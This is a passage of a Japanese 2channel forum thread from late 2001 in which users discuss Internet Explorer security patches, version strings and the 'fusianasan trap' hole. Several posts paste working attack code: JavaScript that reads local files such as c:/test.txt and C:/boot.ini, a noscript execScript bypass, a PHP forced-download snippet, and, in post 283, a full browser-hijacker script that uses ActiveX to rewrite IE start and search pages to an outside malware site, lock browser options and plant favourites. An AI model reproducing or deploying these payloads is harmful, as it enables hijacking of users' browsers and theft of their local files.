DonutとかMDIとかまで重くなります?

149 :147:01/12/20 01:39
>>148
影響は受けません。タブブラウザは激軽です。

逆に聞きたいんですがMoonとかOperaはIEコンポーネントのタブブラウザですか?

150 :ひよこ名無しさん:01/12/20 01:43
修正なんとかってのをインストールしたらもう大丈夫なんですか?

151 :名無しさん@お腹いっぱい。:01/12/20 01:46
>>145
本当だよ。見捨てたのは事実かもしれないけど(・w・。/~~~(時代の流れさ。
実を言うと、このホールは、5.01に無い機能なんだな。それだけ5.5から実装された所を狙われたので、いらないというわけなんです。

152 :名無しさん@お腹いっぱい。:01/12/20 01:47
>>151だが、まぁ。
151の発言は少しおおげさかもしれないな。今思った(w
でも、5.01に影響が無いのは事実です。

153 :名無しさん@お腹いっぱい。:01/12/20 01:48

>>149
Operaは違うと聞いているけど、どうなんだろう?
よくわからん。タブは全部ソースをみたわけじゃないから。

154 :名無しさん@お腹いっぱい。:01/12/20 01:48
>>148
心配するな。影響なし。

155 :147:01/12/20 01:54
>>153
さんくす。

156 :名無しさん@お腹いっぱい。:01/12/20 01:59
「この修正プログラムをインストールするにはIE5.5SP2が必要です」となって、
インストールできないのですが・・・。

157 :名無しさん@お腹いっぱい。:01/12/20 02:01
>>156
鹿児ログ嫁。

158 :名無しさん@お腹いっぱい。:01/12/20 02:02
>>156
修正してもインストールし直してもダメなんです・・・

159 :名無しさん@お腹いっぱい。:01/12/20 02:03
>>156
IE6.0だからだよ。過去スレにでも英語の方につながるURLがあるだろ。
そこで、JAPANESEを選択して、5,5と6.0用の二つのパッチがあるから、自分の使っている方を落とせ。
たぶん、あんたの言ったところには5,5のしかなかったんだろう。

160 :名無しさん@お腹いっぱい。:01/12/20 02:14
ちょっと馬鹿な質問させてください。
>>142にある[5.00.3314.2101 SP2]というのは、5.01SP2のことなんですか?
というか、バージョンってどう読めばいいんでしょう?

161 :名無しさん@お腹いっぱい。:01/12/20 02:21
>>160
俺も詳しい事はわからないけど、それなら5.01SP2であってると思う。
以前に5.5SP2を使っていた事があるから、わかる。(今はIE6.0なんだけどね。

読み方は俺も詳しくはわからない。悪いな。力になれんで。

162 :お腹:01/12/20 02:24
>>160
読み方は知らんけど
http://pc.2ch.net/test/read.cgi/sec/1008355163/4/
らしい。

163 :160:01/12/20 02:30
>>161-162
どうもありがとうございます。
今までずっと[5.00SP2]かな?ってカンチガイしてました。

でも実際どう読むんでしょう…?
というか、5.01だったら[5.01.3314.2102]みたいにしてほしいと思う。

164 :160:01/12/20 02:34
…と思ったら、リンク先にバージョンの一覧ありました。
ごめん…

新しいの出てもわかんないけど…

165 :名無しさん@お腹いっぱい。:01/12/20 02:40
>>151
ありがとうございました。
5.01は今回までは影響を受けてなくて大丈夫でも
今後どうなるかわからないところが痛いですよね。はぁー…

166 :名無しさん@お腹いっぱい。:01/12/20 02:47
>>165
5.01はむしろ、機能的に見放される可能性があるよな。
別に劣ってないのに…MSの策略ですな。これで6.0が増えれば…自動的にXPになっていくと・・・

167 :名無しさん@お腹いっぱい。:01/12/20 03:05
6.0.2600.0000
更新バージョンQ313675

繋げるときのダイアログに電話番号が出るようになったんだけどこれでOK?

168 :A助様 ◆QBxsCmSs :01/12/20 04:57
俺のはバージョンで6.0.2600.0000のあとにアルファベット二文字入ってるんだけど何?

169 :名無しさん@お腹いっぱい。:01/12/20 10:19
6.0.2600.0000IC Q313675 にしました。
それからQ312461を入れようとしてもインストール失敗します。
Q312461はQ313675に含まれているのですか?

>168
俺もそう。雑誌の付録CD−ROMからインストールしたからか?

170 :名無しさん@お腹いっぱい。:01/12/20 10:55
5.01SP2をまだ使うという書き込みもあるけど
もしも5.01だけのセキュリティーホールが見つかった場合、
サポートが切れてるんだから全く公表されないわけだよね。
心配しすぎ?

171 :名無しさん@お腹いっぱい。:01/12/20 11:10
>>169
どの雑誌にIE6.0がついてましたか?

172 :87:01/12/20 12:38
>>103様:これなら初心者にもわかりやすい!ありがとうございました!
MSもこれくらいわかりやすく書いてくれればいいのに。

173 : :01/12/20 13:02
すいません。バッチあててから、フリーズしまくりなんですが・・
特に漢字変換の途中でフリーズします。
なぜでしょうか?
修正前は大丈夫だったんですが。

174 :名無しさん@お腹いっぱい。:01/12/20 13:25
5.01のパッチは出るが年明けではないかと…
MSの開発順がIE6、5.5、5.01になっているから。
利用者数の多い順。

175 :A助様 ◆QBxsCmSs :01/12/20 13:37
つーか、6のSP1まだぁ?

176 :名無しさん@お腹いっぱい。:01/12/20 14:09
>>174
もう出ません。MSが見捨てたから。

177 :名無しさん@お腹いっぱい。:01/12/20 14:11
>>174
信じていいんですか?
それとも素直に6.0にした方がいいんですか?
心情的には信じて5.01のまま年明けまで粘りたいのですが。

178 :名無しさん@お腹いっぱい。:01/12/20 14:43
>>177
待ってても一生出ないよ。

179 :名無しさん@お腹いっぱい。:01/12/20 15:10
>>174
5.0はパッチを当てる必要が無いから出ていないんだよ。
別に気にしなくても良い。サポートを打ち切られそうなのには賛成。
今後、MSは6.0を普及させ、XPを普及させる方向に向かう。(当然だが。
MSのHPに、OSのうちきり期限が出ていた(w
我が愛しの98の命も来年末まで持つか持たないからしい。
ああ、世は儚き…

180 :名無しさん@お腹いっぱい。:01/12/20 15:30
>5.0はパッチを当てる必要が無いから出ていないんだよ
MSは必要のあるなしも確かめてないよ。
サポート打ち切られそうじゃなくて打ち切ったんだから。

http://support.microsoft.com/directory/discontinue.asp

181 :名無しさん@お腹いっぱい。:01/12/20 15:35
ホール イン ワアン

182 :名無しさん@お腹いっぱい。:01/12/20 16:43
なぜ一番できのいい5.01sp2を捨てて
穴だらけの方へユーザーを強制的に移行させたいんだ?
GAYツはバカじゃないの?

183 :名無しさん@お腹いっぱい。:01/12/20 16:50
今、ASPでプログラム作ってるんだけど、
バッチ当てて、セッション変数の受け渡しができなくなった!
当てる前まではできていたのに…。

184 :名無しさん@お腹いっぱい。:01/12/20 17:03
未だにIE4.0なんですが、
今回の問題は、4.0だと関係ないんですよね?

185 :名無しさん@お腹いっぱい。:01/12/20 17:39
>>184
関係無い。安心。でも、普段のネットに困らない?大丈夫なのかな…。
そこんところを逆に聞いてみたい(w

186 :名無しさん@お腹いっぱい。:01/12/20 17:57
>>182
購入客にアピールできるように常に新しい技術をフォローしたいから、じゃないかな・・・・
手塚や石ノ森と同じ強迫観念。こっちは一人で背負ってとうとう力尽きたけど、
MS はプログラマの尻叩いてるだけだから当分安泰かね。

187 :名無しさん@お腹いっぱい。:01/12/20 18:11
>>185
どうして関係ないと言い切れる?

188 :名無しさん@お腹いっぱい。:01/12/20 18:16
>>173
俺も同じ。Meだとやばいのかな。システム復元でパッチ当てる前に戻してとりあえず復帰。

189 :名無しさん@お腹いっぱい。:01/12/20 18:33
初心者なので教えていただきたいのですが、ニュー速板で間違って「ついにビンラディン捕獲!!・・・」
ってやつ踏んじゃったんですけれど、これってここのセキュリティホールのこといってるんですか?
具体的にどうやばいんですか?踏んだ後にセキュリティ関係のアップデートしても意味ないのですか?
詳しいかたお願いします。

190 :-=-:01/12/20 18:34
読んどけ。
http://support.microsoft.com/default.aspx?scid=KB;EN-US;Q164539&ID=KB;EN-US;Q164539

191 :名無しさん@お腹いっぱい。:01/12/20 18:48
5.5と6.0ってどっちがいいんですか?

192 : :01/12/20 20:28
>>173 おれも同じ。
決まって変換時にとぶ。
しかも窓のサイズが言う事聞かない。
さらにPC立ち上げ時、GAMESETINGとかWORDKEY
トリコンでますとかタイマーが出てくる。
訳わかりません。

193 :192:01/12/20 20:29
あっ俺W98のまま

194 :名無しさん@お腹いっぱい。:01/12/20 21:27
IE4.0、MSが見捨てたのでサポート外。
IE4.0使ってて何が起こっても知らず。
IE5.01、パッチでます、MSに問い合わせたから間違いないはず。
電話に出たネーチャンは出ると断言した。

195 :名無しさん@お腹いっぱい。:01/12/20 21:33
MSは言ったことを平気で覆すからなぁ・・・。

196 :USER_AGENT:01/12/21 01:47
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)

パッチあててないと向こうにまる分かりなのか!

パッチあててもfusianasanトラップは直ってないぞー

197 :名無しさん@お腹いっぱい。:01/12/21 01:53
>>194
この際信じたい。
おまえを。電話に出たネーちゃんを。マイクソを。

198 :USER_AGENT:01/12/21 01:54
OutlookExpress6はセキュリティーの設定を切り替えても、
画像の添付ファイルとかがスクリプトエラーとかが出て開けない!
やった! 安全性アップ?

199 :USER_AGENT:01/12/21 01:57
IE6はIE5.5よりちょっと遅くなった…

200 :名無しさん@お腹いっぱい。:01/12/21 02:49
>>196
USER AGENTはパッチに関係なく相手に分かってしまう。

201 :名無しさん@お腹いっぱい。:01/12/21 02:54
>>200
漏れ、昔色々いぢって
Bozilla/4.0 (compatible; SMIE 0.1; Indows 2500
ってやったらなんか怒られた。。。

202 :名無しさん@お腹いっぱい。:01/12/21 03:07
ワラタ

203 :名無しさん@お腹いっぱい。:01/12/21 04:04
>>200
最後の Q312461)の所にパッチのバージョンが出る!ie6

204 :名無しさん@お腹いっぱい。:01/12/21 07:01
USER AGENTを( ● ´ ー ` ● ) にしてるよ!
しょっちゅう怒られるよ!!
( ● ´ ー ` ● ) のどこがいけないんだぁ!!

205 :名無しさん@お腹いっぱい。:01/12/21 08:20
>>204
ワラタ

206 :名無しさん@お腹いっぱい。:01/12/21 09:48
USER AGENTのいじり方を教えて欲しい。

207 :名無しさん@お腹いっぱい。:01/12/21 10:02
ProxyomitronとかenProxyとか

208 :名無しさん@お腹いっぱい。:01/12/21 10:48
Q315000当てたけどバージョン情報でどこが変わったかわからん

209 :名無しさん@お腹いっぱい。:01/12/21 11:34
>207 ありがとう!ぼくも( ● ´ ー ` ● )にするよ。

210 :名無しさん@お腹いっぱい。:01/12/21 14:23
>>207
早速やってみた。
Mozilla/4.0 (compatible; MSIE 3.0; Windows 3.1)
ってやったら怒られなかったよ。

211 :名無しさん@お腹いっぱい。:01/12/21 14:30
>>208
プログラムの追加と削除に、SP1と入っていれば大丈夫です。

212 :名無しさん@お腹いっぱい。:01/12/21 17:44
ところでIE5.01は見捨てられたってことだけど、Win2kSP3じゃIE関係どうなるんだろう。
確かWin2kデフォでIE5→SP2でIE5.01SP2だったと記憶しているが。

213 :名無しさん@お腹いっぱい。:01/12/21 18:35
IE3.02の人は大丈夫?

214 :名無しさん@お腹いっぱい。:01/12/21 19:23
分からないなら使わないほうがモアベターかモナー

215 :名無しさん@お腹いっぱい。:01/12/21 20:47
今もまだ5.01sp2なんだけど大丈夫かな?
sp3を出るのを待ちたいんだけどそれまでに5.01の新穴見つからなければいいんだけど

216 :名無しさん@お腹いっぱい。:01/12/21 21:03
>>215
SP3、多分でないよ・・・。出して欲しいんだけど。

217 :6.0の人、教えて!:01/12/21 23:05
私、5.5sp2なんですが、6.0の友人がDLでとまどってる様子なんです。
6.0の人はDL後が 6.0.2600.0000 Q313675 って表示されるんですか?
それとも>>169さんみたいに、間にICって入るんですか?

218 :名無しさん@お腹いっぱい。:01/12/21 23:07
IEなんて、穴だらけだよ。
寝透けの方がマシ。
まぁ、所詮「マシ」でしかないが。

219 :名無しさん@お腹いっぱい。:01/12/21 23:11
>>217
IC等は入る人もいるし入らない人もいる。
過去に雑誌からIEをインストールしたことあるならICついてるかも。

220 :217:01/12/21 23:13
>>219
なるほど〜、そういう違いなんですか。
どうもありがとうございます!

221 :名無しさん@倉敷CATV:01/12/21 23:29
>>215
MSサイトのどこかで、IE5.5SP3とIE6.0SP1のこと書いていたけど、
5.01sp3はなかったよ

222 :名無しさん@お腹いっぱい。:01/12/22 00:29
>>221
そんなぁぁぁ
そのうち出るはずだよ

223 ::01/12/22 01:19
>>218
最新のネスケはだいぶ良くなったよ。

224 :名無しさん@お腹いっぱい。:01/12/22 02:01
6.0SP1英語版は既に流出してますな、結構セキュリティーの強化されてる。
その代わりIEのバージョンの所のQなんたらは全てクリアされてしまった。

225 :名無しさん@お腹いっぱい。:01/12/22 05:13
ねすけ6.2入れたけど重すぎ。IEより重かった。
どんなスペックで使ってるの?

226 :名無しさん@お腹いっぱい。:01/12/22 08:19
>>225
ネスケは、起動が遅いから、常駐させて使うのがベターなんだよ。
さあ、スタートアップに登録だ。
実際は登録じゃないけど。

227 :名無しさん@お腹いっぱい。:01/12/22 11:10
この前のfushianasanトラップがmemoメーリングリストで
話題になってる。
未知のセキュリティーホールだと書かれてた。
M$に早くパッチ出すように言ったほうがいいんだろうな。

228 :名無しさん@お腹いっぱい。:01/12/22 11:19
>>227
2ちゃんねる発セキュリティホールかな。
それはそれでお祭りだ!ワショーイ!

229 :名無しさん@お腹いっぱい。:01/12/22 11:27
ここで話題になっているパッチを当てられない件でお伺いします。
IE5.5なんですが、やはり「SP2云々」で当てられません。
SP2になっているのですが、「戻す」というのはどうすれば戻せるんでしょうか。
よろしくお願いします。

230 :名無しさん@お腹いっぱい。:01/12/22 11:34
>>229
>>57あたりは読んだか?

231 :名無しさん@お腹いっぱい。:01/12/22 11:59
>>230
ありがとうございます。
読んでみました。
コンパネからの「修復」はエラーが出てできませんでした。
「戻す」というのはどうするのか教えて下さい。

232 :名無しさん@お腹いっぱい。:01/12/22 12:35
インターネット一時ファイルのサイズを小さくしてると
アップデイト出来ないよこともあります。
何時間格闘したことか・・・・・・・・・・・

233 :名無しさん@お腹いっぱい。:01/12/22 13:20
>>231
OSがわからないので、なんとも言えんが・・
システム情報→ツールにIEの修復ツールがないかい?
それで修復ができないのなら、「以前のWindowsの構成に戻す」
で戻せると思うが。

234 :名無しさん@お腹いっぱい。:01/12/22 14:18
fushianasanトラップって何?

235 :名無しさん@お腹いっぱい。:01/12/22 14:21
>>234 少しは自分で検索しようよ。

fusianasanトラップになんらかの対処を
http://pc.2ch.net/test/read.cgi/sec/1008581128/

236 :142:01/12/23 00:06
6.0にしました
が、書き込んだあと掲示板に戻らなくなった

237 :名無しさん@お腹いっぱい。:01/12/23 00:31
まだ5.01Sp2なんですけど・・・ヤバイですか。

238 :名無しさん@お腹いっぱい。:01/12/23 00:51
>>237
既出ではないかと思い至らない点が
相当ヤバイと思います。

239 :名無しさん@お腹いっぱい。:01/12/23 00:59
>>236
ツール>インターネットオプション>セキュリティ>ページの自動読み込み>有効

>>238
234も相手にしてやって…

240 :239:01/12/23 01:01
>238
235さんが処理済みでしたね… スマン

241 :239:01/12/23 01:04
>239
あまちがえた、
ツール>インターネットオプション>セキュリティ>レベルのカスタマイズ>ページの自動読み込み>有効

こんなに奥にあっては面倒でスクリプトをいちいちOFFしづらい…

242 :名無しさん@お腹いっぱい。:01/12/23 01:09
>>229
俺も同じ症状だった。
IEの修復も以前のバージョンに戻すのも試してみたがダメだった。
で、結局以下の方法で修復した。

1.OSの再インストール(ワラ
2.プロバイダのアカウント等のセットアップが終わったら、
MS内のIEのサイトにアクセスし、IE5.5のセットアップファイルを落とす。
3.で、セットアップファイルを実行してIEをバージョンアップする。
んな感じかな。
もちろん最後に、修正パッチもインストールするんだけどな。

で、雑誌などのCDに収録されているIE5.5をインストールしたらダメよ。
俺の場合、それが今回のトラブルの根源だったからね。
数ヶ月前の雑誌に載っているIE5.5は、一部のファイルに問題があるみたいだし。
(雑誌収録の全部が悪いのかは俺には分からんが)

243 :名無しさん@お腹いっぱい。:01/12/23 01:33
>>213
スクリプトが実行できなかったりするから問題ない気が、、、

244 :名無しさん@お腹いっぱい。:01/12/23 18:08
最新情報
http://slashdot.jp/article.pl?sid=01/12/23/0728257&mode=thread

詳細求む

245 :名無しさん@お腹いっぱい。:01/12/24 10:39
Σ(゚д゚lll)ガーン

246 ::01/12/24 15:09
var y = document.open( "c:/test.txt", "x", "width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes" );
setTimeout('alert(y.document.body.innerHTML);y.document.close();',1000);
↑これですな。
c:\test.txtというファイルを置いて↓を踏んでみよう。
http://home.austin.rr.com/wiredgoddess/thepull/fileReading.html
ファイルの内容が変数として読み出せて、
パスとファイル名さえ判ればプライバシー漏れまくり☆
スクリプトオフにしても実行できるしw

247 :擬人:01/12/24 18:08
チョンガー凶悪ハッキングについてこレだろ。
http://www.puchiwara.com/hacking/

248 :名無しさん@お腹いっぱい。:01/12/24 18:16
>>247
たちよみしたけど
なんかマンガばかりでかへってわかりづらかたよ。。。。

249 :ちくしゅおー!:01/12/24 19:04
>>244
どーすんだよこれ!メガネ野郎とっととパッチだせ。

250 :名無しさん@お腹いっぱい。:01/12/24 19:20
>>249
何だよ、ノーマルタイヤで雪道爆走するかの如く
パッチ出て無くても乗りこなすのが
MSユーザーの心意気ぢゃないか。。。

251 :名無しさん@お腹いっぱい。:01/12/24 19:31
MSはあれだろ
わざと不完全を出して
そのあとのユーザーのあわてっぷりを
腹かかえて

252 :名無しさん@お腹いっぱい。:01/12/24 19:36
>>250
そうなの?しらんかった・・・

>>251
くっそ−!それにしてもまじでMSはきらいになってきた。
MSNメッセンジャーでもよけいな常駐ソフトいれやがって。

253 :名無しさん@お腹いっぱい。:01/12/24 19:39
ところで、244のページにあるリンク先サイトなんか
気味悪い。みんなみて感想プリーズ。

254 :名無しさん@お腹いっぱい。:01/12/24 19:52
>>253
へ?漏れは好きだけどな。。/.
WTCテロ勃発当初は良く見に行ったよ。。。
NIMDAの時も。

255 :名無しさん@お腹いっぱい。:01/12/24 20:03
www2.sala.or.jp/~uuu/dhtml/
>>253
ここのことでしょ?

256 :名無しさん@お腹いっぱい。:01/12/25 08:17
>>253
大丈夫2chネラーだよ(w  モナーのゲーム
http://www2.sala.or.jp/~uuu/netrpg/

257 :253:01/12/25 14:28
>>256
2ちゃんねらーだから心配かも。

258 :名無しさん@お腹いっぱい。:01/12/25 14:48
本日、MSから私のWWWサイトへお客さんが来ました。
Agentは、見事に
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)
でした。
本家ですらパッチ全部当ててない。ワショーイ。

MSNのIISもそうだなぁ。
自社製品ぐらい、完璧にパッチ当てとけYO!(藁

259 :名無しさん@お腹いっぱい。:01/12/25 14:49
>>258
パッチが多すぎて無理と思われ。

260 :名無しさん@お腹いっぱい。:01/12/25 14:50
>>258 そう表示させてるだけかもしれんだろ。(w

261 :技術的な解説希望:01/12/25 16:11
インターネット・エクスプローラーに、SSLを偽装できる脆弱性
http://headlines.yahoo.co.jp/hl?a=20011225-00000005-vgb-sci

262 :名無しさん@お腹いっぱい。:01/12/25 16:41
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Q312461)
パッチあててるが、このようにひょうじされる。(by 診断君)
IEのバージョン情報では、Q3136375と表示されてるよ

普段は、ソフトで表示もされないようになってるが・・・
まあ、最近は、IE自体、ほとんど、利用せずだが
(利用頻度 オペラ、IE、ネスケ、LYNX)
2chはABONEで書き込み主体

263 :名無しさん@お腹いっぱい。:01/12/25 17:15
>>217
Internet Explorer 管理者キット (IEAK) 6 からインストールするとそうなります。

ちなみにIEAK5のときは記号の意味は以下のとおりでした。

IC = コンテンツ プロバイダ / 開発者
IS = サービス プロバイダ
CO = 企業内管理者

http://www.microsoft.com/japan/support/kb/articles/J051/6/55.asp

264 :263:01/12/25 17:22
>>263
これ、「ビルド番号の末尾にIC記号が入るとき」のことです。

265 :名無しさん@お腹いっぱい。:01/12/25 17:50
W32.BadtransとかのメールのMIMEヘッダーをまねしたメールを送信したら
Outlookでクリックしたら速攻exeが開かれたよ〜(ver 5.5)

ゲイツ君しっかりしてよ…

exe とオーディオファイルくらいの区別もできんのか?

266 :名無しさん@お腹いっぱい。:01/12/25 22:20
6.0にしたらsageメール・ageメールを踏んどいても
色が変わらなくなった、すんげー不便

267 :名無しさん@お腹いっぱい。:01/12/26 00:59
よく分からないんだけど、新しいパッチは過去のパッチの修正も含んでるの?
それとも順に全部当てないといけないのだろうか?

268 :名無しさん@お腹いっぱい。:01/12/26 01:03
過去の修正も含んでいるが、防げないものもある。
fusianasanトラップは防げないらしいし、JavaScriptオフなのに
実行できる穴もふさがれない。うーん、IE穴だらけだな…。

269 :名無しさん@お腹いっぱい。:01/12/26 01:13
技術的な問題はよく分からないんだけど
スクリプト完全OFF、ってブラウザを作るのは難しいの?

270 :名無しさん@お腹いっぱい。:01/12/26 01:16
>>269
既出。
テキストブラウザ

271 :名無しさん@お腹いっぱい。:01/12/26 01:22
>>270
ども。
テキストブラウザって画像も見れないみたいですね。
これは結構きついかな・・・。

272 :mcn-cm1d1130.miyazaki-catv.ne.jpトラップ」が蔓延:01/12/26 02:27
http://memo.st.ryukoku.ac.jp/archive/200112.month/2396.html
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to=''
attributeName=document.parentWindow.execScript(scr1.innerHTML), set1.outerHTML />
</noscript>
−−−−−
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20011217_ms01-058
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20011204_ie55-ext-spoof
http://www.st.ryukoku.ac.jp/~kjm/test/readme.txt
<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>
−−−−−
2ch でIE のセキュリティホールをつく「fusianasanトラップ」が蔓延
https://www.netsecurity.ne.jp/article/1/3581.html
http://java-house.jp/ml/archive/j-h-b/032585.html
http://memo.st.ryukoku.ac.jp/archive/200112.month/2392.html
<script>
var x=window.open('file://C:/boot.ini');
x.navigate("javascript:alert(document.body.innerText)");
</script>

273 :自爆さんハケーン!:01/12/26 06:10
>>272 :「 mcn-cm1d1130.miyazaki-catv.ne.jpトラップ」が蔓延

「 fusianasanトラップ」が蔓延 って書きたかったのか?

274 :ヒルゲイツ:01/12/26 06:34
>>265
>W32.BadtransとかのメールのMIMEヘッダーをまねしたメールを送信したら
>Outlookでクリックしたら速攻exeが開かれたよ〜(ver 5.5)

Badtrans自体そうでしょ… scrはexeにしても動くはずだよ、pifもいけました。
comもいけたよ!

>ゲイツ君しっかりしてよ…

MSのプログラマーは厨房以下と思われ

275 :名無しさん@お腹いっぱい。:01/12/26 11:27
>>273
自爆尊敬 age

276 :名無しさん@お腹いっぱい。:01/12/26 12:49
>>271
w3m + パッチ で画像も見える。
w3mマンセー。

277 :ガ━━Σ(゜д゜lll)━━ン:01/12/26 17:13
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20011225/1/
 注意しなければならないのは,「MS01-058」に対しては,
IE 5.5 SP2 および IE 6 用のパッチしか用意されていないことだ。
これは,IE 5.5 SP2 および IE 6 以外のバージョンでは問題がないということではなく,
これらより前のバージョンはサポート対象外となっているために
パッチが用意されていないのである。

 「Badtrans.B」などが悪用する過去のセキュリティ・ホールは
IE 5.01 SP2 でふさがれているが,「MS01-058」のセキュリティ・ホールは存在している。
IE 5.5 SP2 あるいは IE 6 以外のユーザーは早急にバージョン・アップするとともに,
パッチを適用する必要がある。「今週のSecurity Check [Windows編]」で解説しているように,
「IE 5.5 SP2 + 『MS01-058』パッチ」あるいは「IE 6 +『MS01-058』パッチ」
以外のバージョンは,セキュリティ的に使用不能なのである。

278 :名無しさん@お腹いっぱい。:01/12/26 19:01
http://www.microsoft.com/JAPAN/support/kb/articles/JP313/6/75.asp

ダウソはここから
http://www.microsoft.com/windows/ie/downloads/critical/q313675/default.asp

279 :名無しさん@お腹いっぱい。:01/12/26 21:15
既出でしたらすみません。
PenU433MHzメモリ192MB
の自分ですが5.5と6.0のsp2どっちがいいでしょうか?

タブブラウザを常用しているのであまり遅い速いは関係ないと思うのですが
AAがズレるのだけはカンベンしていただきたいです。
でもパッチをあてても致命的な穴は6.0の方が多いんですか?

280 :名無しさん@お腹いっぱい。:01/12/26 21:39
>>279
新しい場所へ進んでいる分、6の方が危険性は高い…

281 :272でございます。:01/12/26 21:41
2000を使っていますがすごいことになっています。
パッチの当て方が分かりません。

282 : :01/12/26 21:42
 

283 : :01/12/26 22:19
<!--IPT language=JavaScript
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent </APPLET ");
function AddFavLnk(loc, DispName, SiteURL){var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");Shor.TargetPath = SiteURL;Shor.Save();}
function f(){
try{a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl = a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();FSO = a1.GetObject();a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Net = a1.GetObject();
try{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.ebcvg.com/vx_exe.html");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar", "http://www.ebcvg.com/vx_exe.html");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page", "http://www.ebcvg.com/vx_exe.html");
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions", "1");
var WF, Shor, loc;WF = FSO.GetSpecialFolder(0);loc = WF + "\\Favorites";if(!FSO.FolderExists(loc)){
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";if(!FSO.FolderExists(loc)){return;}}
AddFavLnk(loc,"FREE Forbidden Lolitas Porno","http://freepics.place.cc");
AddFavLnk(loc,"Virii http://www.ebcvg.com/vx_exe.html","http://www.ebcvg.com/vx_exe.html");
catch(e){}}
catch(e){}}
function vx() {
var xxx=window.open('');
xxx.blur();
xxx.location="out.php";}
window.onerror=new Function("self.close();return true");
setTimeout("f()",1000);setInterval("vx()",40000);self.moveTo(5000,5000);self.blur();
setTimeout("window.onfocus=setIt;",300);
function setIt(){
self.moveTo(5000,5000);
self.blur();return false;}
if(document.all) document.onmousedown = setIt;
else if(document.layers){
window.captureEvents(Event.MOUSEDOWN);
window.onmousedown=setIt;}
function xit() {
window.open('xex.html');window.open('out.php');}
</SCRI-->

284 :名無しさん@お腹いっぱい。:01/12/26 22:26
>>280
ありがとうございます。
5.5sp2ってAAどうですか?
友達んちがMe5.5sp2だったんだけど、それで見たら汚くズレてたんですが。
283ってなんですか?

285 :名無しさん@お腹いっぱい。:01/12/26 23:38
CEは問題ないのか?
いまだにPIE3やIE4だぞ・・・

286 :名無しさん@お腹いっぱい。:01/12/27 00:30
>285
全く問題ありません。万が一、調子が悪くなっても、簡単にリセット可能。
メール,webに限れば、ある意味最強!

ちなみに、IE4ではなく、IE4相当のIE for CE。

287 :名無しさん@お腹いっぱい。:01/12/27 00:53
5.5SP2にバージョンアップした後、Windows Updateに行くと
重要な更新で、セキュリティ関係の修正が二つ表示されて
たので(>>227含む)二つともインストール完了。
これで5.5が出てから今までに公開された5.5のセキュリティ
修正パッチは全部充てたってことになるんですか?

288 :287:01/12/27 00:54
追記
5.01SP2からバージョンアップしました。

289 :名無しさん@お腹いっぱい。:01/12/27 01:06
>>287
あれは未対応
OSのとIEの一つずつが最新の修正。

290 :5.01Sp2:01/12/27 02:29
>>287
2chのAAはズレませんか?
レポートお願いします

291 :ヽ(*`Д´)ノゴルァ:01/12/27 03:27
>>283
トロイの木馬でしょ?
なんで放置されてるんだ?
この板を開くたびにscanが反応するぞ〜

292 :ヽ(*`Д´)ノゴルァ:01/12/27 03:44
age

293 :ヽ(*`Д´)ノゴルァ:01/12/27 03:45
sage

294 :ヽ(=゚ω゚)ノ″ぃょぅ:01/12/27 03:45
追い出し完了

295 : :01/12/27 03:57
φ(`д´)カキカキ

Infe.....ヽ(`Д´)ノウワァァァン

296 :名無しさん@お腹いっぱい。:01/12/27 04:22
http://www.heise.de/ct/browsercheck/readme.txt
>>291 別にソース書いてあるだけだから、問題ないと思われ。

297 :291:01/12/27 11:26
>>296
そうなんだ・・・
厨房でごまんなさい

298 :287:01/12/28 00:19
激しく遅レスでスマソ。
>>289
さんきう。
実はレス番号を>>277とするところを、間違えて>>227
してしまった。(w
で、>>287の件は、よく分からんかったので一旦5.01に
戻し、再度5.5にしてMSのセキュリティーセンターに載ってた
順番に修正プログラムを入れた後、重要な更新に飛んで、そ
こで表示された修正プログラムも入れました。

>>290
AAの表情が変わったとは思うけど、特に「ずれてる!」って事は
ないなあ。
ttp://www.skipup.com/~niwatori/index4.htmの真中にある
「■顔文字(AA)について」を参考にして、フォントは変更しました。

299 :290:01/12/28 01:23
>>298
ご丁寧にありがとうございました。
きちんと変更すれば問題ないんですね。
ということは、6.0sp1が出るまでは5.5sp2の方が無難ですよね・・・?

もし何かあったときに、6.0から5.5にするのと、5.5から6.0にするのでは
どっちがより問題ないんですか?

300 :弥生 ◆mx0jj0xA :01/12/28 01:45
>>299
詳しくは無いけど、がんばってレスをしてみる。
6.0→5.5と5.5→6.0を単純に考えると、5.5→6.0の方が問題ないと思う。

301 :名無しさん@お腹いっぱい。:01/12/28 02:23
IE6.0がへんなUDPパケット(ポート不特定)を localhostあてにいっぱい吐くんですが
これってなんなんですか。

302 :名無しさん@お腹いっぱい。:01/12/28 03:07
>>301
私のIE6.0も同一症状が出ます…
本当に何なのでしょう。気味が悪いです。

303 :名無しさん@お腹いっぱい。:01/12/28 15:54
股穴

304 :名無しさん@お腹いっぱい。:01/12/28 16:47
>>302
私のところもです。というか、Listenもしてるみたいです。
あまり詳しくないので私の知らないプロトコルかも。

案外みんなでトロイにかかってたりして(藁

305 :名無しさん@お腹いっぱい。:01/12/28 17:08
>>304
ありそうで怖い。

306 :名無しさん@お腹いっぱい。:01/12/28 17:18
localhostにセッション張るトロイ?ssh風味だな。
それより投げるUDPパケットの行き先の統計とれば何か分かるかも知れんよ。

307 : :01/12/28 19:19
http://java-house.jp/ml/archive/j-h-b/032585.html
